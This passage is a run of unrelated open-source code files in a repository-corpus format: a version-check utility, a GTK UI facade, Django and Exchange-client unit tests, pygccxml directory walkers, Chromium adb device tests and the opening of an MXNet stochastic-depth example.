                    paddingStart, moduleStride, filter_channels,
                    numGroups);
        """

        # Close every brace opened by the setup fragments above.
        braces = '}' * num_braces

        rval = basic_setup + \
            setup_nv_hid_acts + \
            setup_nv_filters + \
            setup_nv_targets + \
            do_convolution + \
            braces

        rval = rval % locals()

        return rval

    def c_code_cache_version(self):
        """
        Version tag for theano's C-code cache; bump whenever c_code changes.
        """
        return (9,)
| bsd-3-clause |
vlachoudis/sl4a | python/src/Tools/versioncheck/pyversioncheck.py | 98 | 4051 | """pyversioncheck - Module to help with checking versions"""
import types
import rfc822
import urllib
import sys
# Verbose options — increasing levels of output; callers compare with >=.
VERBOSE_SILENT=0 # Single-line reports per package
VERBOSE_NORMAL=1 # Single-line reports per package, more info if outdated
VERBOSE_EACHFILE=2 # Report on each URL checked
VERBOSE_CHECKALL=3 # Check each URL for each package

# Test directory used by _test() below.
## urllib bug: _TESTDIR="ftp://ftp.cwi.nl/pub/jack/python/versiontestdir/"
_TESTDIR="http://www.cwi.nl/~jack/versiontestdir/"
def versioncheck(package, url, version, verbose=0):
    """Check whether *version* of *package* is current against *url* and
    print a human-readable report; returns the status from checkonly()
    (-1 no version file, 0 outdated, 1 up-to-date).

    NOTE: Python 2 code (print statements).
    """
    ok, newversion, fp = checkonly(package, url, version, verbose)
    # At high verbosity checkonly() already printed everything.
    if verbose > VERBOSE_NORMAL:
        return ok
    if ok < 0:
        print '%s: No correctly formatted current version file found'%(package)
    elif ok == 1:
        print '%s: up-to-date (version %s)'%(package, version)
    else:
        print '%s: version %s installed, version %s found:' % \
            (package, version, newversion)
        if verbose > VERBOSE_SILENT:
            # Dump the rest of the version file (release notes) indented.
            while 1:
                line = fp.readline()
                if not line: break
                sys.stdout.write('\t'+line)
    return ok
def checkonly(package, url, version, verbose=0):
    """Check *version* against one URL or a list of URLs without printing a
    summary; returns (ok, newversion, fp) from the last URL tried.

    A single string is checked directly; for a list, URLs are tried in
    order and the scan stops at the first usable one unless verbose is
    VERBOSE_CHECKALL. NOTE: Python 2 code (types.StringType).
    """
    if verbose >= VERBOSE_EACHFILE:
        print '%s:'%package
    if type(url) == types.StringType:
        ok, newversion, fp = _check1version(package, url, version, verbose)
    else:
        for u in url:
            ok, newversion, fp = _check1version(package, u, version, verbose)
            # ok >= 0 means the URL yielded a parseable version file.
            if ok >= 0 and verbose < VERBOSE_CHECKALL:
                break
    return ok, newversion, fp
def _check1version(package, url, version, verbose=0):
    """Fetch *url* and compare its Current-Version header with *version*.

    Returns (status, version, fp): status is -1 when the URL cannot be
    opened or lacks the header, 1 when versions match, 0 when they differ.
    Comparison is case-insensitive and whitespace-insensitive.

    NOTE: Python 2 code (urllib.urlopen, rfc822, old except syntax).
    """
    if verbose >= VERBOSE_EACHFILE:
        print ' Checking %s'%url
    try:
        fp = urllib.urlopen(url)
    except IOError, arg:
        if verbose >= VERBOSE_EACHFILE:
            print ' Cannot open:', arg
        return -1, None, None
    # Parse the fetched body as RFC-822 headers to read Current-Version.
    msg = rfc822.Message(fp, seekable=0)
    newversion = msg.getheader('current-version')
    if not newversion:
        if verbose >= VERBOSE_EACHFILE:
            print ' No "Current-Version:" header in URL or URL not found'
        return -1, None, None
    # Normalize both sides before comparing.
    version = version.lower().strip()
    newversion = newversion.lower().strip()
    if version == newversion:
        if verbose >= VERBOSE_EACHFILE:
            print ' Version identical (%s)'%newversion
        return 1, version, fp
    else:
        if verbose >= VERBOSE_EACHFILE:
            print ' Versions different (installed: %s, new: %s)'% \
                (version, newversion)
        return 0, newversion, fp
def _test():
    """Manual smoke test: run versioncheck() against the public test
    directory at verbosity 1 and 2 (requires network access)."""
    print '--- TEST VERBOSE=1'
    print '--- Testing existing and identical version file'
    versioncheck('VersionTestPackage', _TESTDIR+'Version10.txt', '1.0', verbose=1)
    print '--- Testing existing package with new version'
    versioncheck('VersionTestPackage', _TESTDIR+'Version11.txt', '1.0', verbose=1)
    print '--- Testing package with non-existing version file'
    versioncheck('VersionTestPackage', _TESTDIR+'nonexistent.txt', '1.0', verbose=1)
    print '--- Test package with 2 locations, first non-existing second ok'
    versfiles = [_TESTDIR+'nonexistent.txt', _TESTDIR+'Version10.txt']
    versioncheck('VersionTestPackage', versfiles, '1.0', verbose=1)
    print '--- TEST VERBOSE=2'
    print '--- Testing existing and identical version file'
    versioncheck('VersionTestPackage', _TESTDIR+'Version10.txt', '1.0', verbose=2)
    print '--- Testing existing package with new version'
    versioncheck('VersionTestPackage', _TESTDIR+'Version11.txt', '1.0', verbose=2)
    print '--- Testing package with non-existing version file'
    versioncheck('VersionTestPackage', _TESTDIR+'nonexistent.txt', '1.0', verbose=2)
    print '--- Test package with 2 locations, first non-existing second ok'
    versfiles = [_TESTDIR+'nonexistent.txt', _TESTDIR+'Version10.txt']
    versioncheck('VersionTestPackage', versfiles, '1.0', verbose=2)

if __name__ == '__main__':
    _test()
| apache-2.0 |
Tankypon/ubuntu-make | umake/ui/__init__.py | 13 | 1845 | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Canonical
#
# Authors:
# Didier Roche
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; version 3.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""Abstracted UI interface that will be overriden by different UI types"""
from gi.repository import GLib
from umake.tools import Singleton, MainLoop
class UI(object, metaclass=Singleton):
    """Singleton facade over the currently active concrete UI.

    Class methods proxy to ``currentUI`` so callers never need a direct
    reference to the concrete UI plugin object.
    """

    # The concrete UI implementation every classmethod delegates to; set
    # once when the singleton is constructed.
    currentUI = None

    def __init__(self, current_UI):
        UI.currentUI = current_UI

    @classmethod
    def return_main_screen(cls, status_code=0):
        """Ask the active UI to return to its main screen with status_code."""
        cls.currentUI._return_main_screen(status_code=status_code)

    @classmethod
    @MainLoop.in_mainloop_thread
    def display(cls, contentType):
        """display in main thread this UI contentType. Can be delayed by 50 ms, like for pulse or message"""
        # TODO: add check for current framework == framework sending contentType
        cls.currentUI._display(contentType)

    @classmethod
    @MainLoop.in_mainloop_thread
    def delayed_display(cls, contentType):
        """Schedule _display(contentType) on the GLib main loop after 50 ms."""
        GLib.timeout_add(50, cls._one_time_wrapper, cls.currentUI._display, contentType)

    @staticmethod
    def _one_time_wrapper(fun, contentType):
        """To be called with GLib.timeout_add(), return False to only have one call"""
        fun(contentType)
        return False
| gpl-3.0 |
Osmose/kitsune | kitsune/kbforums/tests/test_models.py | 15 | 5250 | import datetime
from nose.tools import eq_
from kitsune.kbforums.models import Thread
from kitsune.kbforums.tests import KBForumTestCase, thread, post as post_
from kitsune.sumo.urlresolvers import reverse
from kitsune.sumo.helpers import urlparams
from kitsune.users.tests import user
from kitsune.wiki.tests import document
class KBForumModelTestCase(KBForumTestCase):
    """URL generation and last_post bookkeeping on kbforum models."""

    def test_thread_absolute_url(self):
        # A thread's absolute URL is the wiki.discuss.posts view for its
        # document, in the document's locale.
        t = thread(save=True)
        exp_ = reverse('wiki.discuss.posts', locale=t.document.locale,
                       args=[t.document.slug, t.id])
        eq_(exp_, t.get_absolute_url())

    def test_post_absolute_url(self):
        # A post's absolute URL is the thread URL plus a #post-<id> anchor.
        t = thread(save=True)
        p = t.new_post(creator=t.creator, content='foo')
        url_ = reverse('wiki.discuss.posts',
                       locale=p.thread.document.locale,
                       args=[p.thread.document.slug, p.thread.id])
        exp_ = urlparams(url_, hash='post-%s' % p.id)
        eq_(exp_, p.get_absolute_url())

    def test_last_post_updated(self):
        """Adding/Deleting the last post in a thread should
        update the last_post field
        """
        t = thread(save=True)
        u = user(save=True)
        # add a new post, then check that last_post is updated
        new_post = t.new_post(creator=u, content="test")
        eq_(t.last_post.id, new_post.id)
        # delete the new post, then check that last_post is updated
        # NOTE(review): this relies on t.last_post still being a model
        # instance (with pk cleared) after delete(); if it became None this
        # attribute access would raise — confirm against the model.
        new_post.delete()
        self.assertIsNone(t.last_post.id)
class KBThreadModelTestCase(KBForumTestCase):
    """Thread lifecycle behavior tied to its posts."""

    def test_delete_last_and_only_post_in_thread(self):
        """Deleting the only post in a thread should delete the thread"""
        d = document(save=True)
        t = thread(title="test", document=d, save=True)
        p = t.new_post(creator=t.creator, content="test")
        eq_(1, t.post_set.count())
        p.delete()
        # The thread itself must be gone once its only post is deleted.
        eq_(0, Thread.objects.filter(pk=t.id).count())
class KBSaveDateTestCase(KBForumTestCase):
    """
    Test that Thread and Post save methods correctly handle created
    and updated dates.
    """
    # Tolerance for comparing "now" against model timestamps.
    delta = datetime.timedelta(milliseconds=3000)

    def setUp(self):
        super(KBSaveDateTestCase, self).setUp()
        self.user = user(save=True)
        self.doc = document(save=True)
        # A thread with a fixed, historic created date.
        self.thread = thread(created=datetime.datetime(2010, 1, 12, 9, 48, 23),
                             save=True)

    def assertDateTimeAlmostEqual(self, a, b, delta, msg=None):
        """
        Assert that two datetime objects are within `range` (a timedelta).
        """
        diff = abs(a - b)
        assert diff < abs(delta), msg or '%s ~= %s' % (a, b)

    def test_save_thread_no_created(self):
        """Saving a new thread should behave as if auto_add_now was set."""
        t = self.doc.thread_set.create(title='foo', creator=self.user)
        t.save()
        now = datetime.datetime.now()
        self.assertDateTimeAlmostEqual(now, t.created, self.delta)

    def test_save_thread_created(self):
        """
        Saving a new thread that already has a created date should respect
        that created date.
        """
        created = datetime.datetime(1992, 1, 12, 9, 48, 23)
        t = self.doc.thread_set.create(title='foo', creator=self.user,
                                       created=created)
        t.save()
        eq_(created, t.created)

    def test_save_old_thread_created(self):
        """Saving an old thread should not change its created date."""
        t = thread(save=True)
        created = t.created
        t.save()
        eq_(created, t.created)

    def test_save_new_post_no_timestamps(self):
        """
        Saving a new post should behave as if auto_add_now was set on
        created and auto_now set on updated.
        """
        p = self.thread.new_post(creator=self.user, content='bar')
        now = datetime.datetime.now()
        self.assertDateTimeAlmostEqual(now, p.created, self.delta)
        self.assertDateTimeAlmostEqual(now, p.updated, self.delta)

    def test_save_old_post_no_timestamps(self):
        """
        Saving an existing post should update the updated date.
        """
        now = datetime.datetime.now()
        p = self.thread.new_post(creator=self.user, content='bar')
        self.assertDateTimeAlmostEqual(now, p.updated, self.delta)
        p.content = 'baz'
        p.updated_by = self.user
        p.save()
        self.assertDateTimeAlmostEqual(now, p.updated, self.delta)

    def test_save_new_post_timestamps(self):
        """
        Saving a new post should not allow you to override auto_add_now- and
        auto_now-like functionality.
        """
        created_ = datetime.datetime(1992, 1, 12, 10, 12, 32)
        p = post_(thread=self.thread, content='bar', creator=self.user,
                  created=created_, updated=created_)
        p.save()
        # Both timestamps must be "now", not the values passed in above.
        now = datetime.datetime.now()
        self.assertDateTimeAlmostEqual(now, p.created, self.delta)
        self.assertDateTimeAlmostEqual(now, p.updated, self.delta)

    def test_content_parsed_sanity(self):
        """The content_parsed field is populated."""
        p = post_(content='yet another post', save=True)
        eq_('<p>yet another post\n</p>', p.content_parsed)
| bsd-3-clause |
linkedin/pyexchange | tests/exchange2010/test_create_event.py | 4 | 10041 | """
(c) 2013 LinkedIn Corp. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
"""
import pickle
import unittest
from httpretty import HTTPretty, httprettified
from pytest import raises
from pyexchange import Exchange2010Service
from pyexchange.connection import ExchangeNTLMAuthConnection
from pyexchange.base.calendar import ExchangeEventAttendee
from pyexchange.exceptions import * # noqa
from .fixtures import * # noqa
class Test_PopulatingANewEvent(unittest.TestCase):
    """ Tests all the attribute setting works when creating a new event """
    calendar = None

    @classmethod
    def setUpClass(cls):
        # One shared calendar service for all attribute-setting tests; no
        # network traffic happens until an event is actually created.
        cls.calendar = Exchange2010Service(
            connection=ExchangeNTLMAuthConnection(
                url=FAKE_EXCHANGE_URL,
                username=FAKE_EXCHANGE_USERNAME,
                password=FAKE_EXCHANGE_PASSWORD,
            )
        ).calendar()

    def test_canary(self):
        event = self.calendar.event()
        assert event is not None

    def test_events_created_dont_have_an_id(self):
        # An id is assigned only by the server, i.e. after create().
        event = self.calendar.event()
        assert event.id is None

    def test_can_add_a_subject(self):
        event = self.calendar.event(subject=TEST_EVENT.subject)
        assert event.subject == TEST_EVENT.subject

    def test_can_add_a_location(self):
        event = self.calendar.event(location=TEST_EVENT.location)
        assert event.location == TEST_EVENT.location

    def test_can_add_an_html_body(self):
        # Setting html_body leaves text_body unset; .body falls back to it.
        event = self.calendar.event(html_body=TEST_EVENT.body)
        assert event.html_body == TEST_EVENT.body
        assert event.text_body is None
        assert event.body == TEST_EVENT.body

    def test_can_add_a_text_body(self):
        event = self.calendar.event(text_body=TEST_EVENT.body)
        assert event.text_body == TEST_EVENT.body
        assert event.html_body is None
        assert event.body == TEST_EVENT.body

    def test_can_add_a_start_time(self):
        event = self.calendar.event(start=TEST_EVENT.start)
        assert event.start == TEST_EVENT.start

    def test_can_add_an_end_time(self):
        event = self.calendar.event(end=TEST_EVENT.end)
        assert event.end == TEST_EVENT.end

    def test_can_add_attendees_via_email(self):
        # A bare email string becomes one required attendee.
        event = self.calendar.event(attendees=PERSON_REQUIRED_ACCEPTED.email)
        assert len(event.attendees) == 1
        assert len(event.required_attendees) == 1
        assert len(event.optional_attendees) == 0
        assert event.attendees[0].email == PERSON_REQUIRED_ACCEPTED.email

    def test_can_add_multiple_attendees_via_email(self):
        event = self.calendar.event(attendees=[PERSON_REQUIRED_ACCEPTED.email, PERSON_REQUIRED_TENTATIVE.email])
        assert len(event.attendees) == 2
        assert len(event.required_attendees) == 2
        assert len(event.optional_attendees) == 0

    def test_can_add_attendees_via_named_tuple(self):
        # An ExchangeEventAttendee tuple carries the required/optional flag.
        person = ExchangeEventAttendee(name=PERSON_OPTIONAL_ACCEPTED.name, email=PERSON_OPTIONAL_ACCEPTED.email, required=PERSON_OPTIONAL_ACCEPTED.required)
        event = self.calendar.event(attendees=person)
        assert len(event.attendees) == 1
        assert len(event.required_attendees) == 0
        assert len(event.optional_attendees) == 1
        assert event.attendees[0].email == PERSON_OPTIONAL_ACCEPTED.email

    def test_can_assign_to_required_attendees(self):
        # Assigning required_attendees replaces the required list wholesale.
        event = self.calendar.event(attendees=PERSON_REQUIRED_ACCEPTED.email)
        event.required_attendees = [PERSON_REQUIRED_ACCEPTED.email, PERSON_OPTIONAL_ACCEPTED.email]
        assert len(event.attendees) == 2
        assert len(event.required_attendees) == 2
        assert len(event.optional_attendees) == 0

    def test_can_assign_to_optional_attendees(self):
        event = self.calendar.event(attendees=PERSON_REQUIRED_ACCEPTED.email)
        event.optional_attendees = PERSON_OPTIONAL_ACCEPTED.email
        assert len(event.attendees) == 2
        assert len(event.required_attendees) == 1
        assert len(event.optional_attendees) == 1
        assert event.required_attendees[0].email == PERSON_REQUIRED_ACCEPTED.email
        assert event.optional_attendees[0].email == PERSON_OPTIONAL_ACCEPTED.email

    def test_can_add_resources(self):
        # The first (only) resource doubles as the conference room.
        event = self.calendar.event(resources=[RESOURCE.email])
        assert len(event.resources) == 1
        assert event.resources[0].email == RESOURCE.email
        assert event.conference_room.email == RESOURCE.email
class Test_CreatingANewEvent(unittest.TestCase):
    """Validation and outgoing-request checks for Event.create(), with the
    Exchange endpoint mocked via httpretty."""
    service = None
    event = None

    @classmethod
    def setUpClass(cls):
        cls.service = Exchange2010Service(connection=ExchangeNTLMAuthConnection(url=FAKE_EXCHANGE_URL, username=FAKE_EXCHANGE_USERNAME, password=FAKE_EXCHANGE_PASSWORD))

    def setUp(self):
        # Fresh event with valid start/end for every test.
        self.event = self.service.calendar().event(start=TEST_EVENT.start, end=TEST_EVENT.end)

    def test_events_must_have_a_start_date(self):
        self.event.start = None
        with raises(ValueError):
            self.event.create()

    def test_events_must_have_an_end_date(self):
        self.event.end = None
        with raises(ValueError):
            self.event.create()

    def test_event_end_date_must_come_after_start_date(self):
        self.event.start, self.event.end = self.event.end, self.event.start
        with raises(ValueError):
            self.event.create()

    def test_attendees_must_have_an_email_address_take1(self):
        with raises(ValueError):
            self.event.add_attendees(ExchangeEventAttendee(name="Bomb", email=None, required=True))
            self.event.create()

    def test_attendees_must_have_an_email_address_take2(self):
        with raises(ValueError):
            self.event.add_attendees([None])
            self.event.create()

    def test_event_reminder_must_be_int(self):
        self.event.reminder_minutes_before_start = "not an integer"
        with raises(TypeError):
            self.event.create()

    def test_event_all_day_must_be_bool(self):
        self.event.is_all_day = "not a bool"
        with raises(TypeError):
            self.event.create()

    # NOTE(review): the next three methods do not start with "test_", so
    # unittest never collects or runs them — confirm whether that is
    # intentional or they should be renamed.
    def cant_delete_a_newly_created_event(self):
        with raises(ValueError):
            self.event.delete()

    def cant_update_a_newly_created_event(self):
        with raises(ValueError):
            self.event.update()

    def cant_resend_invites_for_a_newly_created_event(self):
        with raises(ValueError):
            self.event.resend_invitations()

    @httprettified
    def test_can_set_subject(self):
        # Mock the endpoint, create the event, then inspect the captured
        # SOAP request body for the expected field.
        HTTPretty.register_uri(
            HTTPretty.POST, FAKE_EXCHANGE_URL,
            body=CREATE_ITEM_RESPONSE.encode('utf-8'),
            content_type='text/xml; charset=utf-8',
        )
        self.event.subject = TEST_EVENT.subject
        self.event.create()
        assert TEST_EVENT.subject in HTTPretty.last_request.body.decode('utf-8')

    @httprettified
    def test_can_set_location(self):
        HTTPretty.register_uri(
            HTTPretty.POST, FAKE_EXCHANGE_URL,
            body=CREATE_ITEM_RESPONSE.encode('utf-8'),
            content_type='text/xml; charset=utf-8',
        )
        self.event.location = TEST_EVENT.location
        self.event.create()
        assert TEST_EVENT.location in HTTPretty.last_request.body.decode('utf-8')

    @httprettified
    def test_can_set_html_body(self):
        HTTPretty.register_uri(
            HTTPretty.POST, FAKE_EXCHANGE_URL,
            body=CREATE_ITEM_RESPONSE.encode('utf-8'),
            content_type='text/xml; charset=utf-8'
        )
        self.event.html_body = TEST_EVENT.body
        self.event.create()
        assert TEST_EVENT.body in HTTPretty.last_request.body.decode('utf-8')

    @httprettified
    def test_can_set_text_body(self):
        HTTPretty.register_uri(
            HTTPretty.POST, FAKE_EXCHANGE_URL,
            body=CREATE_ITEM_RESPONSE.encode('utf-8'),
            content_type='text/xml; charset=utf-8',
        )
        self.event.text_body = TEST_EVENT.body
        self.event.create()
        assert TEST_EVENT.body in HTTPretty.last_request.body.decode('utf-8')

    @httprettified
    def test_start_time(self):
        HTTPretty.register_uri(
            HTTPretty.POST, FAKE_EXCHANGE_URL,
            body=CREATE_ITEM_RESPONSE.encode('utf-8'),
            content_type='text/xml; charset=utf-8',
        )
        self.event.create()
        assert TEST_EVENT.start.strftime(EXCHANGE_DATE_FORMAT) in HTTPretty.last_request.body.decode('utf-8')

    @httprettified
    def test_end_time(self):
        HTTPretty.register_uri(
            HTTPretty.POST, FAKE_EXCHANGE_URL,
            body=CREATE_ITEM_RESPONSE.encode('utf-8'),
            content_type='text/xml; charset=utf-8',
        )
        self.event.create()
        assert TEST_EVENT.end.strftime(EXCHANGE_DATE_FORMAT) in HTTPretty.last_request.body.decode('utf-8')

    @httprettified
    def test_attendees(self):
        HTTPretty.register_uri(
            HTTPretty.POST, FAKE_EXCHANGE_URL,
            body=CREATE_ITEM_RESPONSE.encode('utf-8'),
            content_type='text/xml; charset=utf-8',
        )
        attendees = [PERSON_REQUIRED_ACCEPTED.email, PERSON_REQUIRED_TENTATIVE.email]
        self.event.attendees = attendees
        self.event.create()
        for email in attendees:
            assert email in HTTPretty.last_request.body.decode('utf-8')

    # NOTE(review): unlike the sibling tests above, this method is missing
    # the @httprettified decorator yet still calls HTTPretty.register_uri —
    # confirm whether the decorator was dropped by mistake.
    def test_resources_must_have_an_email_address(self):
        HTTPretty.register_uri(
            HTTPretty.POST, FAKE_EXCHANGE_URL,
            body=CREATE_ITEM_RESPONSE.encode('utf-8'),
            content_type='text/xml; charset=utf-8',
        )
        attendees = [PERSON_WITH_NO_EMAIL_ADDRESS]
        with raises(ValueError):
            self.event.attendees = attendees
            self.event.create()

    @httprettified
    def test_resources(self):
        HTTPretty.register_uri(
            HTTPretty.POST, FAKE_EXCHANGE_URL,
            body=CREATE_ITEM_RESPONSE.encode('utf-8'),
            content_type='text/xml; charset=utf-8',
        )
        self.event.resources = [RESOURCE.email]
        self.event.create()
        assert RESOURCE.email in HTTPretty.last_request.body.decode('utf-8')

    def test_events_can_be_pickled(self):
        # Round-trip through pickle must preserve event state.
        self.event.subject = "events can be pickled"
        pickled_event = pickle.dumps(self.event)
        new_event = pickle.loads(pickled_event)
        assert new_event.subject == "events can be pickled"
| apache-2.0 |
daviddoria/itkHoughTransform | Wrapping/WrapITK/Languages/SwigInterface/pygccxml-1.0.0/pygccxml/utils/fs_utils.py | 13 | 4611 | # Copyright 2004-2008 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
import os
from types import *
##If you want include files that doesn't have extension then use filter like '*.'
def _make_list( argument ):
    """Normalize *argument* into a list of strings.

    A non-empty string becomes a one-element list, an empty string becomes
    an empty list, and a list passes through unchanged; any other type
    raises TypeError.
    """
    arg_type = type(argument)
    if arg_type in StringTypes:
        return [argument] if argument else []
    if arg_type is ListType:
        return argument
    raise TypeError( 'Argument "%s" must be or list of strings or string.' % argument )
class base_files_iterator:
    """Shared machinery for file iterators filtered by extension patterns.

    *file_exts* is a string or list of patterns such as ``'*.h'``; when
    *is_include_exts* is true the patterns select files to keep, otherwise
    files to drop.
    """
    def __init__(self, file_exts, is_include_exts = True):
        self.__file_exts = _make_list( file_exts )
        self.__is_include_exts = is_include_exts
    def _is_to_skip(self, file_path):
        # With no patterns configured, nothing is ever skipped.
        if not self.__file_exts:
            return 0
        extension = os.path.splitext( file_path )[1]
        if not extension:
            extension = '.' + extension
        pattern = '*' + extension
        if pattern.lower() in self.__file_exts:
            return not self.__is_include_exts
        return self.__is_include_exts
    def _subdirectories_and_files(self, directory_path):
        # Split one directory's entries into (sub-directories, kept files).
        directories, files = [], []
        for entry in os.listdir(directory_path):
            entry_path = os.path.join(directory_path, entry)
            if os.path.isfile( entry_path ) and not self._is_to_skip( entry_path ):
                files.append( entry_path )
            elif os.path.isdir( entry_path ):
                directories.append( entry_path )
        return directories, files
    def __iter__(self):
        raise NotImplementedError
    def next(self):
        raise NotImplementedError
    def restart(self):
        raise NotImplementedError
class files_walker(base_files_iterator):
    """Iterate over files beneath one or more directories, filtered by extension."""
    def __init__(self, directories, file_ext_filter = '', is_include_filter = True, is_recursive = True):
        base_files_iterator.__init__(self, file_ext_filter, is_include_filter)
        self.__directories = _make_list( directories )
        self.__is_recursive = is_recursive
        self.__file_generator = None
    def __walk(self):
        # Breadth-first traversal; sub-directories are queued only when recursive.
        pending = self.__directories[:]
        while pending:
            sub_dirs, found_files = self._subdirectories_and_files( pending.pop(0) )
            if self.__is_recursive:
                pending.extend( sub_dirs )
            for found in found_files:
                yield found
    def __iter__(self):
        self.__file_generator = self.__walk()
        return self
    def next(self):
        return self.__file_generator.next()
    def restart(self):
        self.__file_generator = None
class directories_walker:
    """Iterate over the sub-directories of one or more root directories."""
    def __init__(self, directories, is_recursive = 1):
        self.__directories = []
        for root in _make_list( directories ):
            self.__directories.extend( self.__sub_directories( root ) )
        self.__is_recursive = is_recursive
        self.__directory_generator = None
    def __sub_directories(self, directory_path):
        # Immediate child directories only; plain files are ignored.
        children = []
        for entry in os.listdir(directory_path):
            candidate = os.path.join(directory_path, entry)
            if os.path.isdir( candidate ):
                children.append( candidate )
        return children
    def __walk(self):
        for current in self.__directories[:]:
            yield current
            if self.__is_recursive:
                # Recurse by delegating to a nested walker rooted here.
                for nested in directories_walker( [current], True ):
                    yield nested
    def __iter__(self):
        self.__directory_generator = self.__walk()
        return self
    def next(self):
        return self.__directory_generator.next()
    def restart(self):
        self.__directory_generator = None
if __name__ == '__main__':
    # Module is import-only; the historical ad-hoc experiments stay commented out.
    pass
    #lFileCount = 0
    #for file_os in files_iterator( r'C:\Program Files\Microsoft Visual Studio\VC98\Include\stlport', ['*.h', '*.'], True, False):
    #print file_os
    #lFileCount += 1
    #print lFileCount
    #~ for directory in directories_iterator( '/home/roman/language-binding', False ):
    #~ print directory
    #~ for directory in directories_iterator( '/home/roman/language-binding', True ):
    #~ print directory
| apache-2.0 |
TeslaProject/external_chromium_org | build/android/pylib/device/adb_wrapper_test.py | 36 | 2716 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for the AdbWrapper class."""
import os
import tempfile
import time
import unittest
from pylib.device import adb_wrapper
from pylib.device import device_errors
class TestAdbWrapper(unittest.TestCase):
  """Integration tests for AdbWrapper.

  NOTE(review): these tests require a real (or emulated) Android device to
  be attached, and they mutate device state (file pushes, reboot, remount).
  """
  def setUp(self):
    # Pick the first attached device and block until adb reports it ready.
    devices = adb_wrapper.AdbWrapper.GetDevices()
    assert devices, 'A device must be attached'
    self._adb = devices[0]
    self._adb.WaitForDevice()
  @staticmethod
  def _MakeTempFile(contents):
    """Make a temporary file with the given contents.
    Args:
      contents: string to write to the temporary file.
    Returns:
      The absolute path to the file.
    """
    fi, path = tempfile.mkstemp()
    with os.fdopen(fi, 'wb') as f:
      f.write(contents)
    return path
  def testShell(self):
    # Shell() returns the command's stdout both with and without an explicit
    # expected return code, and raises when the actual code mismatches.
    output = self._adb.Shell('echo test', expect_rc=0)
    self.assertEqual(output.strip(), 'test')
    output = self._adb.Shell('echo test')
    self.assertEqual(output.strip(), 'test')
    self.assertRaises(device_errors.AdbCommandFailedError, self._adb.Shell,
                      'echo test', expect_rc=1)
  def testPushPull(self):
    # Round-trip a small file: push to the device, cat it there, pull it back.
    path = self._MakeTempFile('foo')
    device_path = '/data/local/tmp/testfile.txt'
    local_tmpdir = os.path.dirname(path)
    self._adb.Push(path, device_path)
    self.assertEqual(self._adb.Shell('cat %s' % device_path), 'foo')
    self._adb.Pull(device_path, local_tmpdir)
    with open(os.path.join(local_tmpdir, 'testfile.txt'), 'r') as f:
      self.assertEqual(f.read(), 'foo')
  def testInstall(self):
    # Installing a file that is not a valid APK must fail.
    path = self._MakeTempFile('foo')
    self.assertRaises(device_errors.AdbCommandFailedError, self._adb.Install,
                      path)
  def testForward(self):
    # Port 0 is not a valid forwarding spec, so Forward must raise.
    self.assertRaises(device_errors.AdbCommandFailedError, self._adb.Forward,
                      0, 0)
  def testUninstall(self):
    # Uninstalling a package that is not installed must fail.
    self.assertRaises(device_errors.AdbCommandFailedError, self._adb.Uninstall,
                      'some.nonexistant.package')
  def testRebootWaitForDevice(self):
    # Reboot and poll until the device leaves and then re-enters the 'device'
    # state and the package manager answers queries again.
    self._adb.Reboot()
    print 'waiting for device to reboot...'
    while self._adb.GetState() == 'device':
      time.sleep(1)
    self._adb.WaitForDevice()
    self.assertEqual(self._adb.GetState(), 'device')
    print 'waiting for package manager...'
    while 'package:' not in self._adb.Shell('pm path android'):
      time.sleep(1)
  def testRootRemount(self):
    # Restarting adbd as root briefly drops the connection; retry 'start'
    # until the shell is reachable again, then remount /system writable.
    self._adb.Root()
    while True:
      try:
        self._adb.Shell('start')
        break
      except device_errors.AdbCommandFailedError:
        time.sleep(1)
    self._adb.Remount()
# Allow running this device-dependent suite directly from the command line.
if __name__ == '__main__':
  unittest.main()
| bsd-3-clause |
mlperf/training_results_v0.6 | Fujitsu/benchmarks/resnet/implementations/mxnet/example/stochastic-depth/sd_mnist.py | 8 | 4244 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
################################################################################
# A sanity check mainly for debugging purpose. See sd_cifar10.py for a non-trivial
# example of stochastic depth on cifar10.
################################################################################
import os
import sys
import mxnet as mx
import logging
import sd_module
def get_conv(
        name,
        data,
        num_filter,
        kernel,
        stride,
        pad,
        with_relu,
        bn_momentum
):
    """Build a Convolution -> BatchNorm (-> optional ReLU) symbol chain.

    Returns the BatchNorm output, wrapped in a ReLU activation when
    *with_relu* is true.
    """
    convolution = mx.symbol.Convolution(
        name=name, data=data, num_filter=num_filter,
        kernel=kernel, stride=stride, pad=pad, no_bias=True
    )
    batch_norm = mx.symbol.BatchNorm(
        name=name + '_bn', data=convolution, fix_gamma=False,
        momentum=bn_momentum,
        # Same with https://github.com/soumith/cudnn.torch/blob/master/BatchNormalization.lua
        # cuDNN v5 don't allow a small eps of 1e-5
        eps=2e-5
    )
    if not with_relu:
        # It's better to remove ReLU here
        # https://github.com/gcr/torch-residual-networks
        return batch_norm
    return mx.symbol.Activation(name=name + '_relu', data=batch_norm, act_type='relu')
# Sanity-check configuration: one stochastic-depth stage with a 30% drop
# probability, run on CPU.
death_rates = [0.3]
contexts = [mx.context.cpu()]
# Stem: a 3x3 conv that always runs; stochastic-depth blocks follow it.
data = mx.symbol.Variable('data')
